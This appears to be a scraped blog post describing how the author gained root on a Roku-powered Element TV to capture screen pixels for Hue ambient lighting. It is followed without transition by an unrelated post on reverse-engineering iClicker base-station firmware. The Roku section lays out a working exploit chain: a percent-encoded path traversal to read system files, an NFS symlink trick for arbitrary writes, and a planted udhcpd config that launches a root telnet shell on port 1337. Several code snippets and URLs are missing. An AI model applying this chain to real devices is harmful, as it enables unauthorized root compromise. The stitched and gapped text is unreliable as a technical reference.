Hacking a Roku TV to Control Lights

This is a rather large blog post consisting of multiple sections from some quick background information about the problem to an in-depth dive into the hacking process, reverse engineering and final custom application.

I’ve included a table of contents to make it easy to navigate or if you want to skip to any parts you’re particularly interested in.

Table of Contents

The Problem

I’ve got two things in my living room.

A set of Philips Hue lights that provide light around the room.

The Hue lights are really nice, allowing you to change up the color and brightness to really change the look of your environment. You can go from a bright white fluorescent light for studying to a dim yellow nightlight for midnight lounging.

Moreover, Philips semi-recently released a feature called Hue Entertainment that allows you to sync up your lights to music, videos etc. This looks absolutely fantastic and really makes watching movies and playing games a lot more immersive like this:

A 50-inch Elment 4K TV powered by Roku.

This Element TV was one of the cheapest at the time and it has held up well over the years.

I don’t actually use any of the Roku/Smart TV functionality on it, instead the primary sources on it are a Playstation, Xbox and Chromecast.

All of this brings us to the problem, the Hue ecosystem is blissfully unaware of anything on the TV. The Hues need some sort of software that can read the pixel values on the screen and set the lights to the right color. On the computer, this is achieved through the use of the Hue Sync App, a program that runs in the background capturing your screen and using it to decide the colors.

However, when it comes to content playing on the TV, there is really no easy way to pump the pixel data to your controller software. You could mirror your computer screen with an HDMI cable but that’s doesn’t allow you to capture stuff like game consoles and requires you to playback all your media on your computer.

If you wanna pay an arm and a leg, Philips has a device called an HDMI Sync Box. It costs $230 at the time of writing, almost the price of the actual TV! The sync box works as a 4-way HDMI switcher, you plug in all your devices like your Chromecast and consoles into it and then you can select which one to pass through. It listens in on the video signal and then uses it to match the lights. Simple enough but stupidly expensive.

On the other hand homebrew solutions for this vary widely. One of the most promising ones has been using an HDMI splitter that takes the signals and sends it to two outputs. You plug one into the TV and plug the other into a capture card hooked up to a Raspberry Pi. The Pi then uses software written by the Harmonize Project to sync up the lights.

One solution that I used for a little while was to have a Raspberry Pi hooked up with a camera looking at the screen. Perform some perspective warping and then detect the colors on screen with that. This was pretty appealing since it requires no fuffing about with HDMI cables or splitters. You can find an example of such code here as part of the PiHueEntertainment project. You can find my own hacky disgusting code to do the same thing here.

Roku TVs

Alright, now that we know a bit about the problem, let’s talk about Roku powered TVs.

Roku devices themselves are positively ancient, they came out in 2008 and predate the creation of Chromecasts, Fire TV sticks, AppleTV etc. They popularized the lightweight streaming device area, allowing people to watch Netflix, Youtube, Hulu and friends on their TVs in a super convenient way.

Starting in the mid 2010s, we started seeing the popularization of “smart TVs”. As opposed to “dumb TVs” that can only display what you plug into them, these smart TVs started integrating streaming features into the TV itself. This meant that TVs themselves started being able to connect to the internet and have enough hardware to stream and decode video.

Roku, realizing they had already built up a software stack and ecosystem in this area partnered with TV manufacturers to provide Roku as the operating system for these Smart TVs. This partnership was generally done with low-end TV makers like TCL, Hisense and my own Element. These companies would generally not be able to write their own smart TV software unlike the big players: Samsung, LG, Sony etc.

Now these Roku TVs have one particularly creepy and privacy intrusive “feature.” The TV will look at the content you’re watching from your HDMI/cable or other devices and advertise watching them from the beginning on their own smart services. This Verge article goes into it in a bit more detail. It shows up on the TV like this:

The presence of this advertising indicates that the TV is capable of monitoring what is being played through its inputs and encouraged me to start looking for a way to try to get my own code running on it.

Hacking the Roku

The Roku Developer Ecosystem

Within Roku’s operating system, each streaming service is serviced in the form of an app which Roku calls a “channel”. These apps/channels can be obtained from Roku’s marketplace and allow services like Netflix, ESPN, Youtube etc to make their interfaces and streams available on Roku devices.

The selection of Roku channels is massive and ranges from the big name streaming services to little games: https://channelstore.roku.com/browse/apps

As such, Roku has an SDK so that you can developer your own little Roku app. The process for developing an app is quite open, allowing you to use your own device as a development environment as long as you know the right button combo to press. Much like Android where you tap the Build Number button in the about page to enable developer options, on Roku you enter a Konami-code like sequence.

Roku’s developer setup page goes over the details, at the time of writing you just had to press (Home, Home, Home, Up, Up, Right, Left, Right, Left, Right) to be brought to the developer settings. Once active, your TV starts up a web server that lets you upload apps packaged as zip files.

Coding Roku Apps

Great, so this allowed me to run my own apps on the Roku. Now what are these apps actually programmed in?

As it turns out, Roku has rolled their own programming called BrightScript. And it is based on, of all things, Basic.

In their own words, BrightScript is an interpreted language running on a C-based interpreter.

BrightScript compiles code into bytecode that is run by an interpreter. This compilation step happens every time a script is loaded and run. There is no separate compile step that results in a binary file being saved. In this way it is similar to JavaScript.

BrightScript is a powerful bytecode-interpreted scripting language optimized for embedded devices. In this way it is unique. For example, BrightScript and the BrightScript component architecture are written in 100% C for speed, efficiency, and portability.

As anyone who has tried to sandbox a capable language will tell you, it is a fairly tough job. Correctly restricting things like filesystem access, ensuring you don’t accidentally expose library functions and the like without support from the operating system such as with cgroups is very tough. On an embedded system such isolation was unlikely so BrightScript was likely going to be a good place to start to find exploits.

BrightScript is fairly powerful, it has bindings for stuff like OpenSSL, UDP/TCP sockets and JSON parsing. After uploading the hello world app and having a glance at the developer documentation, I quickly realized there was actually an interactive REPL for Brightscript running on a telnet server on the TV.

We can hop onto the Brightscript REPL server with telnet 8085 and start exploring:

Brightscript Debugger> di = CreateObject("roDeviceInfo")

Brightscript Debugger> ? di.GetModel()

Brightscript Debugger> ? di.GetModelDetails()
<Component: roAssociativeArray> =
    ModelNumber: "7515X"
    ScreenSize: 50
    VendorName: "Element"
    VendorUSBName: "Longview_Changhong_Element_YN"

As it turns out, my TV model, the 7000X is fairly powerful according to Roku’s specs.

  4K Roku TV
Code Name Longview
roDeviceInfo.GetModel() 7000X
CPU ARM dual core 1.2 GHz
Accelerated Graphics API OpenGL ES 2.0
Max UI Resolution 1920X1080
Max Playback Resolution 3840x2160

A Vulnerable API Function

The next step was to explore the API surface and one really interesting aspect of this was the roUrlTransfer object which essentially allows you to make http requests. For example:

Brightscript Debugger> r = CreateObject("roUrlTransfer")
Brightscript Debugger> r.SetUrl("http://example.com")
Brightscript Debugger> ? r.GetToString()
<!doctype html>
    <title>Example Domain</title>

Where there’s http on embedded devices, curl or libcurl is usually close behind. The documentation on the ifUrlTransfer page also confirms this:

EnablePeerVerification(enable as Boolean) as Boolean

Verifies that the certificate has a chain of trust up to a valid root certificate using CURLOPT_SSL_VERIFYPEER.

One key thing to realize about curl is that even though it is primarily used for web requests, it supports a wide variety of other protocols (these can be disabled during compilation) such as:

  • ftp:// - File Transfer Protocol
  • gopher:// - The Gopher Protocol

but most importantly for us, it supports the file:// protocol that lets you grab files from the local file system. For example on your machine running

$ curl file:///etc/passwd

will grab the contents of /etc/passwd.

Could it really be this easy? Could we just grab files off the Roku like this? Sadly, no.

Brightscript Debugger> r.SetUrl("file:///etc/passwd")
*** ERROR: Missing or invalid PHY: '/etc/passwd'

Clearly there was some attempt to restrict the file:// protocol, but how good was this attempt? As it turns out, not really. Roku wanted you to be able to use file:// to access files that you could access through the normal file APIs they provide, so for exmaple you can do:

Brightscript Debugger> r.SetUrl("file://pkg:/manifest")
Brightscript Debugger> ? r.GetToString()
##   Channel Details
title=Hello World

If we acctually run the GetUrl() method after performing this, we can see what the BrightScript internals end up rewriting this into:

? r.GetUrl()

exposing some nice internal paths to us. But this also shows that they seem to be concatening our url path in front of tmp/plugin/GPAAAAX4Lckh/ so could we just use the ../.. characters in the URL to traverse up the path?

Brightscript Debugger> r.SetUrl("file://pkg:/../../../../etc/passwd")
Brightscript Debugger> ? r.GetUrl()

Not quite, looks like there’s some magic going on that strips out the dot dots out of the url. However, there seems to be one simple trick that the Roku developers forgot about. URLs support url/percent encoding, so instead of putting in the raw .. we can replace it with the equivelant percent encoded characters, %2E%2E. This gives us the url:


Checking r.GetUrl() again, this time we see:

Brightscript Debugger> ? r.GetUrl()

Cool, the traversal characters didn’t get stripped out, so I crossed my fingers and fired off:

Brightscript Debugger> ? r.GetToString()
default:x:500:500:Default non-root user:/home/default:/bin/sh
app:x:501:501:roku app:/home/default:/bin/sh

There we go, an arbitrary read primitive.

Leveraging the File Read Exploit

So at this point we have the ability to read files from the system, but what does this really give us? Well Linux is awesome and exposes a lot of critical information through procfs usually present under /proc/ on the system.

For example, the file /proc/self/environ will tell you the environment variables the file-reading process was launched with:

$ TEST=123 cat /proc/self/environ

Among other things, procfs also exposes the memory map of a process, e.g what memory addresses parts of the executable, shared libraries, the stack and heap are present at. This is usually found at /proc/self/maps.

procfs can also tell you what filesystems are mounted on the system through /proc/mounts.

Both of these were absolutely valuable in performing reconnaissance and understanding how Roku had set up their Linux distribution. For example through /proc/version we can learn what kernel the Roku is using:

Linux version 3.10.108-grsec-rt122 ([email protected])
(gcc version 5.4.0 (crosstool-NG crosstool-ng-1.22.0 - Roku GCC toolchain 20191226))
#1 SMP PREEMPT Thu Jul 16 21:50:19 UTC 2020

Through /proc/self/maps we learn that the main Roku application that runs on the TV lives under /bin/Application and it utilizes a ton of shared libraries:

00010000-00c82000 r-xp 00000000 fd:fa 2272       /bin/Application
00c92000-00c9a000 r--p 00c72000 fd:fa 2272       /bin/Application
00c9a000-00cb0000 rw-p 00c7a000 fd:fa 2272       /bin/Application
6b104000-6b21a000 r-xp 00000000 fd:fa 2606       /lib/libPlayReady.so
ac975000-ac9c6000 r-xp 00000000 fd:fa 2574       /lib/libBrightScript.so

Through this information we can acquire the application binary as well as the key libraries and pop them open in ghidra to understand how they work. As it turns out the Roku software stack is a gaint C++ application. As someone who is primarily used to reverse-engineering C this presented a bit of a learning curve but once you figure out the usual suspects like std::string and std::vector, it becomes a lot easier. It also helped that the system uses lots of shared libraries so there are a lot of exported symbol names present.

Grabbing binary files was a little more complex than simple text files, this is because BrightScript strings are null terminated and thus the r.GetToString() function would only return results up to the first null byte, making it useless for ELFs and other binaries. We ended up finding a work-around by saving the data to a file with r.GetToFile("tmp:/file_to_save") and then streaming it over the network in chunks that could be held in memory or saving it to a USB drive using r.GetToFile("ext1:/file").

At this point, I realized that my method of downloading one file at a time was fairly limited and only gave me a fairly narrow view on what was on the system. So we took a look at /proc/cmdline:

LX_MEM=0x21c00000,0x08a00000 LX_MEM2=0xac800000,0x13800000 EMAC_MEM=0x20400000,0x00100000 rtlog_mem_pa=0x20200000 rtlog_mem_size=0x00200000 vmalloc=512m console=ttyS0,0 ethaddr=00:e4:00:0e:f2:69 roku.bdrev=6 ip=off root=/dev/mtdblock_robbs1 ro rootfstype=cramfs init=/init roku.wakeupreason= backlight=0 rokuled=50,1,1536 mtdparts=edb64M-nand:7168k(Boot),[email protected](Active),[email protected](Update),[email protected](RW)enc,[email protected](ID),[email protected](PC),[email protected](UBAPP),[email protected](LLAT),[email protected](SPARE) roku.blgpio=164:H chip_id=0xa02e8b0c model_has_hdr10=1 totalmem=1024 roothash=3b1d203af1706cdaf86af4a5b8530ed9c15d42478039b174f50bb1d095dfc1fe BOOTTIME_SBOOT=2636 BOOTTIME_UBOOT=914

and noticed

root=/dev/mtdblock_robbs1 ro rootfstype=cramfs init=/init

specifically. We realized that rootfs is loaded from /dev/mtdblock_robbs1 and is cramfs based. So at this point we decided to download the entire /dev/mtdblock_robbs1 device and take a look at it. Running binwalk on it we find:

$ binwalk mtdblock_robbs1.cramfs

0             0x0             Roku aimage SB
512           0x200           Squashfs filesystem, little endian, version 4.0, compression:gzip, size: 63975146 bytes, 3615 inodes, blocksize: 131072 bytes, created: 2020-12-04 05:06:22
63979520      0x3D04000       Roku aimage SB
64245760      0x3D45000       Roku aimage SB
64293472      0x3D50A60       AES S-Box
64296384      0x3D515C0       AES Inverse S-Box
64491980      0x3D811CC       Roku aimage SB
64512364      0x3D8616C       SHA256 hash constants, little endian
65266848      0x3E3E4A0       CRC32 polynomial table, little endian
65267872      0x3E3E8A0       CRC32 polynomial table, little endian
65433083      0x3E66DFB       mcrypt 2.2 encrypted data, algorithm: blowfish-448, mode: CBC, keymode: 8bit
66324957      0x3F409DD       Cisco IOS experimental microcode, for "O"
69996544      0x42C1000       Roku aimage SB
69996800      0x42C1100       uImage header, header size: 64 bytes, header CRC: 0x2B984F0E, created: 2020-12-04 05:06:45, image size: 3409876 bytes, Data Address: 0x21C08000, Entry Point: 0x21C08000, data CRC: 0x64F1A541, OS: Linux, CPU: ARM, image type: OS Kernel Image, compression type: gzip, image name: "Linux 3.10.40"
69996864      0x42C1140       gzip compressed data, maximum compression, has original file name: "vmlinux.bin", from Unix, last modified: 2020-12-04 05:06:44
73420800      0x4605000       Roku aimage SB

Awesome, it’s in an intact squashfs filesystem and a bunch of extra stuff tacked on at the end. Having binwalk extract out the squashfs we find:

$ ls disk_image
bin     config  dev  home  lib      media  nvram  opt      proc    root  sdcard0  sys  usr  www
common  custom  etc  init  linuxrc  mnt    omv    plugins  RokuOS  sbin  sdcard1  tmp  var

This made it significantly easier to understand the overall structure of the system and find exploits in more than just the main application binary.

Getting More Access

While we could read files and understand the behavior of the system pretty thoroughly, we were still pretty far from code execution. At this point I met a couple of really smart hackers on the Exploiteers discord, devnull and popeax who helped a lot by sharing information and tricks they had discovered.

We were able to discover an undocumented feature in /bin/Application that Roku had implemented to make the development process a lot easier. Instead of constantly re-uploading a .zip file to test your channel, they allowed running a channel through from a Network File System (NFS) mount. NFS basically allows you to mount directories from other servers over a network connection. You could utilize this feature by adding the key pkg_nfs_mount like so:


to your channel manifest. Upon seeing this in the manifest, the channel loader will try to mount the NFS server and directory you specified and then read the source files from there.

The key thing to realize about an NFS mount is that it supports all the features of a Linux filesystem, including the ability to have symlinks. So for example if on your NFS server you have a symlink set up pointing to / like so:

[email protected]:/media/nfs$ ls -la .
drwxr-xr-x 5 root  root  4096 Apr 23 12:13 .
drwxr-xr-x 3 root  root  4096 Mar 24 06:53 ..
-rw-r--r-- 1 root  root   876 Apr 23 12:13 manifest
lrwxrwxrwx 1 root  root     1 Mar 24 06:56 root -> /

then anyone who mounts the directory will also see:

[email protected]:~$ ls -la /tmp/test-mount/root
lrwxrwxrwx 1 root root 1 Mar 24 06:56 /tmp/test-mount/root -> /

Importantly, this symlink is resolved on the end of whoever mounted it, so accessing the file /tmp/test-mount/root/etc/passwd will actually lead to the /etc/passwd file on the nfs-client system.

Now the implications for this in terms of BrightScript access are absolutely huge, while we could only read files with the curl based exploit, this actually lets us write to arbitrary locations in the filesystem too. Ordinarily the BrightScript filesystem restricts you to locations such as pkg:/, tmp:/, ext1:/ etc and has robust protection against traversal, a symlink such as the one from the method above is not detected.

This means that we can now use BrightScript methods such as WriteAsciiFile to write to anywhere on the filesystem. For example:

WriteAsciiFile("pkg:/root/tmp/test", "hello world")

and this actually shows up on the Roku under /tmp/test.

Great so through some reverse engineering and a little help from our friends we’ve turned our arbitrary read into an arbitrary read-write.

Code Execution from Writing Files

Despite being able to write to anywhere, we are still fairly limited. The actual filesystem is mounted as read-only for almost all directories. This means that getting code execution won’t be as simple as replacing /bin/Application or anything like that.

In particular, the only directories that were writable were /tmp and /nvram. /tmp is as it would be on a conventional Linux system, a temporary file system. /nvram is a non-volatile storage location that stores data such as the channels installed by the user, channel specific login information and system settings and preferences.

Would it be possible to get code execution from writing into one of these directories? At first glance it seemed fairly difficult, while a lot of init scripts will execute stuff stored in /nvram, for example S56sound:

# Dev mode local override
read roku_dev_mode rest < /proc/cmdline
if [ "$roku_dev_mode" = 'dev=1' ] && [ -f /nvram/S86sound ]
    echo "=== ALSA INIT from /nvram/S86sound"
    source /nvram/S86sound
    modprobe mhal-alsa-audio || echo "WARNING:  ALSA driver not found or failed to load"

these are guarded by "$roku_dev_mode" = 'dev=1' checks which is a parameter set in /proc/cmdline (the Linux startup parameters) for Roku development machines.

Eventually after searching all across the application and system scripts in the disk image we stumbled upon the following code as part of the S64wifi init script:

[ -f /nvram/udhcpd-p2p.conf ] && UDHCPD_CONF=/nvram/udhcpd-p2p.conf
cp $UDHCPD_CONF /tmp/udhcpd-p2p.conf
echo "interface $P2PINTF" >> /tmp/udhcpd-p2p.conf
udhcpd /tmp/udhcpd-p2p.conf

Let’s take a minute to examine what this is doing.

  1. Set UDHCPD_CONF to default to /lib/wlan/realtek/udhcpd-p2p.conf.
  2. If /nvram/udhcpd-p2p.conf exists, override UDHCPD_CONF with that file.
  3. Copy the UDHCPD_CONF file to /tmp/udhcpd-p2p.conf.
  4. Start up udhcpd (A light-weight DHCP server part of busybox) using the configuration file in /tmp/udhcpd-p2p.conf.

This means that we fully control all configuration parameters to udhcpd if we set up our own /nvram/udhcpd-p2p.conf file, which the arbitrary file write exploit allows us to do.

Despite busybox’s reputation of being lightweight, you can expect that any daemon will have a fun set of options and udhpcd is no exception. It provides this absolutely fantastic option called notify_file which is described as:

Everytime udhcpd writes a leases file, the below script will be called.

Useful for writing the lease file to flash every few hours.

#notify_file #default: (no script)

And there we have it, as soon as udhcpd hands out a lease, it will invoke the notify_file we specified. As a cherry on top, udhcpd runs as root as part of the startup process, so whatever script we provide it will run as root.

For those curious, the Roku has a dhcp server because it supports connecting certain remotes and devices over a Wi-Fi Direct network.

While I initially ended up connecting my phone to trigger a lease to be handed out, we also realized that turning auto_time to a very tiny interval will also cause notify_file to be invoked and this allows the root to be persistent across restarts without any human intervention.

With this in hand, we set up a script file containing

busybox telnetd -l /sbin/loginsh -p 1337

point notify_file towards it and as soon as a lease is handed out we have a root telnet server on port 1337:

$ telnet 1337
Connected to
Escape character is '^]'.

WIFI DRIVER PATH: /lib/wlan/realtek
longview:/ # whoami

(You can read more about how this process was made slicker by popeax here)

From Code Execution to Ambient Lighting

Reverse Engineering the TV’s Recognition

Alright so that was a whole adventure to get code execution going, now we can finally get to the problem that kicked this all off. Getting the TV to control the lights based on the content it is showing.

So back to the creepy feature I talked about in the introduction, in Roku and industry speak it is known as “Automatic Content Recognition” (ACR), Roku themselves describe it as:

The Roku TV is also equipped with Automatic Content Recognition (ACR) technology that, when enabled, allows Roku to recognize the programs and commercials being viewed through the Roku TV’s antenna, and devices connected to your Roku TV, including cable and satellite set top boxes.

so searching for symbols related to “ACR” in the reverse engineered codebase was a good place to start.

One of the symbols we find is gnsdk_acr_query_write_video_frame. For those wondering, it looks like Roku uses Gracenote’s ACR library, hence the gnsdk.

If we look at the caller of the function, it comes with the following logging calls:

  s_acr.gn._00ca3837, "thrd.exit.early.nullptr",
  "Could not create VideoCapture device"

  s_acr.gn._00ca3837, "cap.toosmall",
  "captured frame too small, width %d", iVar3);

  s_acr.gn._00ca3837, "thrd.pause",
  "Capture loop is paused");

This is definitely all stuff related to capturing the output of the screen, putting us on the right track.

In particular the "Could not create VideoCapture device" logging call is very interesting, it is present under the following context:

av_instance = Roku::PlatformAV::GetInstance();
videoCaptureDevice = (av_instance->vtable + 0x24)(av_instance);

if ((int)videoCaptureDevice == 0) {
    s_acr.gn._00ca3837, "thrd.exit.early.nullptr",
    "Could not create VideoCapture device");

meaning the code we are after is going to be under the PlatformAV class, and specifically as part of one of the methods it implemenets. Following this chain of code down to the VideoCapture class and doing some reverse engineering we find that it does the following:

IDirectFB *dfb = ...;

const char* capture_descriptor_format = ""

char[500] descriptor;
int descriptor_length = snprintf(
  descriptor, 500, capture_descriptor_format,
  0, 0, capture_width, capture_height, "FALSE", "FALSE");

DFBDataBufferDescription data_buffer_descr;
data_buffer_descr.flags = 2;
data_buffer_descr.file = (char *)0x0;
data_buffer_descr.data = descriptor;
  "GOPC Buffer: %s", descriptor);

IDirectFBDataBuffer *buffer;

if (dfb->CreateDataBuffer(dfb, &data_buffer_descr, &buffer) != 0) {
  Roku::Log::Logger::logConsole(s_mstarvidcap._001d1190, "fail",
    "CreateDataBuffer failed");

IDirectFBImageProvider *imageProvider;
int return_code = buffer->CreateImageProvider(buffer, &imageProvider)
if (return_code != 0) {
  Roku::Log::Logger::logConsole(s_mstarvidcap._001d1190, "fail",
    "DFB CreateImageProvider failed (%p) %d", imageProvider, return_code);

This was an absolute pain to reverse, but once done led exactly to the critical library in the capturing process. These CreateDataBuffer and CreateImageProvider functions are provided by a library called DirectFB (Direct Frame Buffer) which is what Roku uses to draw to the TV.

Thanks to DirectFB being licensed under the LGPL, Roku releases their modifications as part of their OpenSourceSoftware dropbox. So I grabbed Roku Open Source Software > 9.4.0 > OSS-RokuHDRTV > sources > directfb-1.4.2 and started taking a look.

Writing our own Screen Capture Code

The directfb source code provided by Roku was an absolute treasure trove of information. As it turns out the Roku TV uses a chip by MStar Semiconductors that is responsible for dealing with all the HDMI functionality of the TV. This includes decoding the HDCP DRM system, switching inputs etc.

As part of the directfb source provided by Roku are examples provided by MStar, which demonstrate exactly how to use the MStar’s capturing API. In particular, the "GOPC" stuff we saw in the Roku code above corresponds to a DirectFB image provider that utilizes the MStar GOP API to capture the image on screen. I’m not sure what GOP stands for here, if anyone does please let me know.

This capture device uses pretty low-level MStar APIs internally, e.g MApi_GOP_DWIN_Init() and MApi_GOP_SetClkForCapture() to provide a high level API to capture the screen. From what I can tell the MStar chip performs a Direct Memory Access (DMA) into the memory of the Roku to place the image into it. Either way, the low level details aren’t too important, what we can take away from this is that we should be able to write our own DirectFB code and capture the screen.

Thus I set up a development environment on my Raspberry Pi so I could compile for ARM and hacked away. Luckily the Makefile in the directfb sources that Roku provide told me exactly how to compile my program:

FUSION_LIB= -ldirect -lfusion
MSTAR_LIB= -lrt -lpthread -ldrvMVOP -lapiGFX -lapiGOP -llinux  -ldrvVE -lapiXC -lapiPNL -ldrvWDT -ldrvSAR -lapiSWI2C -ldrvGPIO -ldrvCPU -ldrvCMDQ -lapiVDEC -ldrvAUDSP -lapiAUDIO -ldrvIPAUTH -lapiJPEG -lapiDMX -lapiDLC -lapiACE

pixels_on_tv: pixels_on_tv.c
	gcc -O3 \
		-Idirectfb/src -Idirectfb/include -Idirectfb/lib \
		pixels_on_tv.c \
		-L./lib/ $(FUSION_LIB) $(MSTAR_LIB) \
		-Wl,--dynamic-linker=/lib/ld-linux.so.3 -o pixels_on_tv

I shoved the libraries from the disk image I retrieved earlier and started off the process with a very simple hello-directfb program:

#include <directfb.h>

int main(int argc, char** argv) {
    printf("Hello, world!\n");

    IDirectFB *dfb;

    int fb_argc = 1;
    char* arg = "Application";
    char** fb_argv = &arg;

    DirectFBInit(&fb_argc, &fb_argv);

After this I loosely followed the reverse-engineered code from the Roku VideoCapture class and created a GOPC image provider with


and used

    imageProvider->RenderTo(imageProvider, surface, NULL);
    surface->Dump(surface, "./dump/", "test");

With that I was blisfully met with a test-00000.bmp that contained:

A perfect little 4K screenshot of the episode of “Halt and Catch Fire” being played on the TV 🙏

Getting the Lights to React to the Captured Video

With the image in hand, the final piece of the puzzle is getting the lights to actually change with the content on the screen. This part is relatively easy though hard to do in a performant way. My initial prototype captured the entire screen and beamed it over to my laptop so I could display it full screen there and just use the regular Hue Sync application to test out.

This certainly worked but it was truly slow, sending a raw 4K image across a local network from the device ran at around 1-2 frames per second. This was far too slow. While I could have tried using a JPG encoder to make a much smaller iamge, I figured that it would be a bit too slow to handle too.

The solution I ended up with for now was to capture the corners of the screen for a faster capture time, average the pixel values on the device for the corners and then send those over. This roughtly ended up looking like this:

void compute_average_pixel_value(YCbCrColor* average, int pitch, int height,
                                 unsigned char* data, int x, int y) {
    YCbCrColor total = { 0 };

    data += (y * pitch);
    for (int j = 0; j < EDGE_WIDTH; j++) {
        // Each data_u32 represents 2 pixels.
        const u32* data_u32 = (u32*) data;

        for (int i = x / 2; i < (x / 2) + EDGE_WIDTH / 2; i++) {
            total.y  += data_u32[i] & 0xFF;
            total.cr += ((data_u32[i] >> 8) & 0xFF) * 2;
            total.y  += (data_u32[i] >> 16) & 0xFF;
            total.cb += ((data_u32[i] >> 24) & 0xFF) * 2;

        data += pitch;
    average->y = total.y / (EDGE_WIDTH * EDGE_WIDTH);
    average->cr = total.cr / (EDGE_WIDTH * EDGE_WIDTH);
    average->cb = total.cb / (EDGE_WIDTH * EDGE_WIDTH);

void perform_capture(CaptureStruct* cap) {
    cap->imageProvider->RenderTo(cap->imageProvider, cap->surface, NULL);

    void* data;
    int data_pitch;
    cap->surface->Lock(cap->surface, DSLF_READ, &data, &data_pitch);

            data_pitch, cap->height, data, 0, 0);


The only hiccup here was figuring out the exact YCbCr color encoding that the MStar uses, but that was again conveniently provided by the directfb source code.

Currently the code sends these averaged YCbCr colors of each corner to my laptop which then shows them the full-screen as a set of boxes for the Hue app to pick up:

After I clean up the code, I will open source it. In the future I’m hoping to integrate it directly with the Hue entertainment API so it can control the lights directly but for now, enjoy this demo. It runs at a stable 20-30 fps now so the effect looks great:

Reverse Engineering the iClicker Base Station

What are iClickers?

iClickers are used in a lot of colleges in order to conduct quizzes and take attendance. The whole ecosystem operates as follows:

  1. Each student buys an iClicker device. They’ve got some buttons on them to respond to multiple choice questions.

  2. They enter the unique ID on the back of the device into their school database.

  3. Each class is equipped with a base station that connects to the instructor’s computer via USB. With iClicker’s software, they can conduct quizzes and export the answers for automatic grading.

State of the art of iClicker reverse engineering

A significant amount of work has been done as far as figuring out how the student owned remotes work. The seminal work in this area is contained in this fantastic paper conducted by some students at the University of British Columbia where they dumped out the firmware of the remote. Some key contributions they made were figuring out the exact radio transceiver used in the device as well as the obfuscation scheme used in the transmission of the IDs.

Following up to this, some students at Cornell started off a project called iSkipper where they attempted to create an open source alternative to the iClicker. By using logic analyzers and dumping out the raw communications using a software defined radio, they were able to piece together the protocol that the remotes use to send their answers over the air. They wrote their own implementation of an iClicker that can be run on an Arduino with just a 900MHz radio transceiver.

While the iSkipper project has managed to figure out most of the iClicker protocol, one missing piece is the communication from the base station back to the remotes. Upon pressing a button, the base station sends back an acknowledgement packet to indicate that the answer has been accepted. In addition, the base station can also send a welcome message to the remotes to indicate what class is currently in progress.

In order to figure out this last missing piece of the iClicker puzzle, I set out to reverse engineer the receiver.

Acquiring the firmware

The first part of reverse engineering the base station would be to obtain the firmware that runs on it. Since I didn’t own a base station and didn’t want to buy one (you can get them for anywhere between $50-$100 on eBay), I had to figure out an alternative approach to acquiring the firmware.

Searching for iClicker base station firmware led me to the “iClicker Base Firmware Utility” on the iClicker downloads page. This software claimed to be able to update the firmware on a base station so it seemed like a natural target. I initially guessed that they would package the updated firmware with the executable but searching around in the distributed files I couldn’t locate any firmware files. Next up I ended up starting the executable.

“Check for Update”, interesting. This was a massive hint that the updates were most likely downloaded over the internet. Thus, I cracked open the executable in IDA and searched away for interesting URLs.

Aha! http://update.iclickergo.com/ic7files/iclicker/QA/.

Opening up this URL in a browser, I found that most of the files were updates the firmware utility itself, but there were two very interesting files:

  • update_v0602.txt
  • U_BASEU_V0058.txt

Here is a chunk of update_v0602.txt:


For those unfamiliar, this an Intel HEX file, Getting into a binary format was as simple as:

objcopy -I ihex update_v0602.txt -O binary firmware.bin

and with that, I had the firmware on my hands without having to install a JTAG interface or an AVR programmer into a base station.

Reverse engineering the firmware

Alright so next up we gotta disassemble the firmware. I strongly suspected that there was some Atmel chip inside the base station, just like the remote. Atmel makes some very popular programmable microcontrollers, a lot of embedded systems, IoT devices and the Arduino platform use Atmel chips.

Luckily IDA supports disassembling AVR, the architecture used by these microcontrollers. So I cracked the firmware open in IDA and went to hunt down the code that generates the acknowledgement packets.

Take the next section with a heavy grain of salt, this was my first time reverse engineering embedded software and it was very much new and uncharted territory for me. If I made any glaring mistakes, please feel free to reach out and I’ll try to amend them :)

ID Decoding

There was a lot of code and I wasn’t exactly familiar with AVR so in order to get my bearings, I set out to find a known piece of the protocol: the scrambling and de-scrambling routine for the iClicker remote ID. The iSkipper project had already figured out the algorithm to do this:

void iClickerEmulator::decodeId(uint8_t *id, uint8_t *ret) {
    ret[0] = (id[0] >> 3) | ((id[2] & 0x1) << 5) | ((id[1] & 0x1) << 6) | ((id[0] & 0x4) << 5);
    ret[1] = ((id[0] & 0x1) << 7) | (id[1] >> 1) | (id[2] >> 7);
    ret[2] = ((id[2] & 0x7c) << 1) | (id[3] >> 5);
    ret[3] = ret[0]^ret[1]^ret[2];

So a good place to start would be finding functions that do a lot of bit shifting. Searching for “lsr” (Logical Shift Right), I found a peculiar function:

  lsr     r30
  lsr     r30
  lsr     r30

In AVR, the lsr opcode shifts its argument register right by 1 bit, this looked an awful lot like the initial part of the decoding algorithm so I followed to the callers of this right_shift_3 function.

There were some cool tricks that the compiler used in this area, for example in order to shift right by 7, it didn’t emit 7 lsr instructions. Instead, the sequence of instructions was

swap    r30
andi    r30, 0xF
lsr     r30
lsr     r30
lsr     r30

The swap instruction swaps the two nibbles of the byte, so the higher order 4 bites get swapped with the lower order 4 bits. Performing an and with 0xF = 0b1111 after this essentially does the same thing as shifting right by 4.

While this approach led me to the function that decodes the ID, the rest of the calling logic was not particularly easy to follow. I needed to find more landmarks in the code to figure out what was going on.

Radio SPI Interface

As mentioned in the introduction, previous reverse-engineers had already figured out what radio chip was used in the clicker, namely the Semtech XE1203F.

Consulting the datasheets for the IC, we can see that it uses a 3-wire SPI (Serial Peripheral Interface) based protocol in order to configure the radio chip. The next logical step was to look at an SPI tutorial for AVR microcontrollers, I found a great one here with the following code sample:

ldi r16,0xAA
out SPDR,r16         ; Initiate data transfer. 

sbis SPSR,SPIF       ; Wait for transmission to complete.
rjmp Wait
in SPDR,r16	         ; The received data is placed in r16.

Perfect, so we have to look up usages of the SPDR register within the firmware. There is only one place that used this register, so I labelled the function as read_write_from_SPI. It reads one argument stored at (Y+1) and then writes it out the SPI port.

ROM:1393 read_write_from_SPI:                    ; CODE XREF: read_write_two_bytes_SPI
ROM:1393                 st      -Y, r16         ; Spill register r16
ROM:1394                 cli                     ; Disable interrupts
ROM:1395                 ldd     r30, Y+1
ROM:1396                 out     SPDR, r30       ; SPI Data Register
ROM:1397 loc_1397:                               ; CODE XREF: read_write_from_SPI+7
ROM:1397                 in      r30, SPSR       ; SPI Status Register
ROM:1398                 andi    r30, 0x80
ROM:1399                 cpi     r30, 0x80
ROM:139A                 brne    loc_1397

Here is one of the usages of the SPI writing function:

ROM:082A                 ldi     r30, 0xF
ROM:082B                 ldi     r31, 0x8A
ROM:082C                 st      -Y, r31
ROM:082D                 st      -Y, r30
ROM:082E                 call    read_write_two_bytes_SPI
